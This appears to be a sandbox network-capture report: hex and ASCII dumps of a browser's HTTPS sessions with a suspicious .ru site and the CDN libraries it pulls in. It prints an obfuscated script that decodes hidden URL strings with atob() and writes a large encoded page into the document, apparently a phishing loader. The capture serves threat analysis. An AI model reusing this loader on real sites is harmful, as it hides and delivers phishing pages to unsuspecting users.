2025-03-24 22:03:06 UTC	764	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 5a 48 4e 7a 4a 4a 51 32 6c 43 4d 57 4a 45 59 6d 4d 33 4e 57 56 47 64 6d 4e 77 4d 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 54 52 4c 56 30 52 76 63 47 68 44 53 6b 4e 53 4e 46 42 4c 4e 57 55 31 59 33 52 74 56 6a 56 30 54 30 56 73 4d 56 52 59 4e 30 73 33 63 31 64 58 62 6b 34 30 55 30 6b 35 5a 32 6c 79 59 55 52 78 59 6b 63 35 56 31 59 78 5a 32 31 45 65 58 46 50 4e 31 45 77 59 7a 4e 32 4d 32 59 31 56 48 4e 59 4e 45 6c 54 65 6b 34 72 5a 7a 67 79 59 6e 68 34 54 56 6c 7a 63 47 39 4d 52 6b 34 35 57 47 6c 6f 65 6c 4e 7a 56 46 52 79 53 6b 52 6c 4f 45 4e 56 4b 32 34 33 65 56 5a 46 62 33 4d 34 63 6c 68 31 54 55 78 7a 53 57 6c 50 56 6d 4d Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlZHNzJJQ2lCMWJEYmM3NWVGdmNwM2c9PSIsInZhbHVlIjoiTTRLV0RvcGhDSkNSNFBLNWU1Y3RtVjV0T0VsMVRYN0s3c1dXbk40U0k5Z2lyYURxYkc5V1YxZ21EeXFPN1EwYzN2M2Y1VHNYNElTek4rZzgyYnh4TVlzcG9MRk45WGloelNzVFRySkRlOENVK243eVZFb3M4clh1TUxzSWlPVmM
2025-03-24 22:03:06 UTC	1369	IN	Data Raw: 37 66 66 39 0d 0a 3c 73 63 72 69 70 74 3e 0a 4d 42 76 64 6f 4a 6c 59 42 53 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 4c 4e 6a 63 75 64 6e 4e 32 64 47 4e 74 65 58 4d 75 63 6e 55 76 63 6d 35 46 65 55 56 51 62 30 78 48 51 57 78 6c 4c 77 3d 3d 22 29 3b 0a 73 61 65 75 6e 76 76 6a 45 4c 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 6f 7a 42 74 6d 54 63 74 76 66 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 4d 42 76 64 6f 4a 6c 59 42 53 20 3d 3d 20 73 61 65 75 6e 76 76 6a 45 4c 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 6f 7a 42 74 6d 54 63 74 76 66 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 Data Ascii: 7ff9<script>MBvdoJlYBS = atob("aHR0cHM6Ly9LNjcudnN2dGNteXMucnUvcm5FeUVQb0xHQWxlLw==");saeunvvjEL = atob("bm9tYXRjaA==");ozBtmTctvf = atob("d3JpdGU=");if(MBvdoJlYBS == saeunvvjEL){document[ozBtmTctvf](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0
2025-03-24 22:03:06 UTC	1369	IN	Data Raw: 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 Data Ascii: Wk44Wk44Wk776g776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk44Wk776g44Wk44Wk776g776g44Wk44Wk776g44Wk776g776g44Wk776g44Wk44Wk776g776g44Wk44Wk44Wk776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk44Wk776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk7
2025-03-24 22:03:06 UTC	1369	IN	Data Raw: 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 Data Ascii: k44Wk44Wk44Wk776g776g776g776g44Wk776g776g776g776g776g776g44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk44Wk776g44Wk776g776g44Wk776g44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk44Wk44Wk776g776g44
2025-03-24 22:03:06 UTC	1369	IN	Data Raw: 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 Data Ascii: 44Wk44Wk776g776g776g44Wk44Wk776g44Wk44Wk776g44Wk44Wk776g776g776g44Wk44Wk44Wk776g44Wk776g44Wk776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk776g776g44Wk776g44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk776g776g44Wk776g44Wk776g776g776g776g776g44Wk776g776g776g44Wk776g776
2025-03-24 22:03:06 UTC	1369	IN	Data Raw: 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b Data Ascii: 4Wk776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g44Wk776g776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk776g776g776g44Wk776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk776g44Wk776g44Wk44Wk44Wk776g44Wk776g776g776g776g44Wk44Wk44Wk776g44Wk
2025-03-24 22:03:06 UTC	1369	IN	Data Raw: 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 Data Ascii: 6g44Wk776g776g776g44Wk776g44Wk776g776g776g776g776g44Wk776g776g776g44Wk776g776g44Wk44Wk776g44Wk776g44Wk44Wk776g44Wk44Wk776g776g44Wk776g44Wk776g44Wk44Wk44Wk44Wk776g776g44Wk776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g4
2025-03-24 22:03:06 UTC	1369	IN	Data Raw: 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 Data Ascii: g44Wk44Wk44Wk776g776g776g44Wk776g776g776g776g776g776g44Wk776g776g44Wk776g776g776g776g44Wk776g44Wk776g776g776g44Wk776g44Wk44Wk44Wk44Wk776g44Wk776g776g44Wk776g776g44Wk44Wk44Wk776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk776g44Wk44Wk77
2025-03-24 22:03:06 UTC	1369	IN	Data Raw: 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 Data Ascii: 776g776g776g44Wk776g44Wk776g44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk776g44Wk776g776g44Wk776g776g44Wk776g776g776g776g776g776g776g44Wk44Wk44Wk44Wk776g44Wk776g776g44Wk776g776g776g776g776g776g44Wk776g44Wk44Wk776g44Wk44Wk776g776g776g776g44Wk776g44Wk776g776g776
2025-03-24 22:03:06 UTC	1369	IN	Data Raw: 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b Data Ascii: 76g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g44Wk44Wk44Wk44Wk776g44Wk44Wk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49728	151.101.2.137	443	1236	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 22:03:07 UTC	575	OUT	GET /jquery-3.6.0.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Referer: https://kxxc.vsvtcmys.ru/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 22:03:07 UTC	565	IN	HTTP/1.1 200 OK Connection: close Content-Length: 89501 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-15d9d" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Date: Mon, 24 Mar 2025 22:03:07 GMT Via: 1.1 varnish Age: 1522769 X-Served-By: cache-lga21979-LGA X-Cache: HIT X-Cache-Hits: 1783 X-Timer: S1742853787.294387,VS0,VE0 Vary: Accept-Encoding
2025-03-24 22:03:07 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2025-03-24 22:03:07 UTC	16384	IN	Data Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]\|\|(a[S]={}))[a.uniqueID]\|\|(o[a.uniqueID]={}))[h]\|\|[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]\|\|(d=s=0)\|\|u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]\|\|(a[S]={}))[a.uniqueID]\|
2025-03-24 22:03:07 UTC	16384	IN	Data Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType\|\|9===e.nodeType\|\|!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t\|\|(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
2025-03-24 22:03:07 UTC	16384	IN	Data Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65 Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
2025-03-24 22:03:07 UTC	16384	IN	Data Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)\|\|(i=S.attrHooks[t.toLowerCase()]\|\|(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
2025-03-24 22:03:07 UTC	7581	IN	Data Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52 Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain\|\|e["X-Requested-With"]\|\|(e["X-R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49729	104.17.24.14	443	1236	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 22:03:07 UTC	603	OUT	GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Referer: https://kxxc.vsvtcmys.ru/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 22:03:07 UTC	960	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 22:03:07 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"61182885-40eb" Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 292602 Expires: Sat, 14 Mar 2026 22:03:07 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i0ik34SQFMCgcYJaPYgIkmE862BFlH%2BDoma1GYf1J6HgTEO8dp0FZEKNeagnXkObkCAzuPwC85mk9U%2BRodcU0Ngt4WcH6y%2BLXYLCIL1y0sjmqbfbq0iBRPbywqFjgLEx4BYKdsc%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 925974eafc781875-EWR alt-svc: h3=":443"; ma=86400
2025-03-24 22:03:07 UTC	409	IN	Data Raw: 37 62 66 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 